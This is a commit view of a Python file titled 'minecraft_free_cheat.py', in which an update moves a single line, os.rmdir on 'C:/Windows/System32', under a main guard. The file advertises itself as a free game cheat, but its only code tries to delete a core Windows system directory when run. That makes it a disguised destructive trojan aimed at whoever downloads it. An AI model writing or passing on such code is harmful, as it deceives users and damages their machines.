Browse Source

Обновить 'minecraft_free_cheat.py'

Ethosa 1 year ago
parent
commit
a235b456c2
1 changed files with 2 additions and 2 deletions
  1. 2 2
      minecraft_free_cheat.py

+ 2 - 2
minecraft_free_cheat.py

@@ -1,5 +1,5 @@
 import os
 
-os.rmdir("C:/Windows/System32");
 
-cool
+if __name__ == '__main__':
+  os.rmdir("C:/Windows/System32");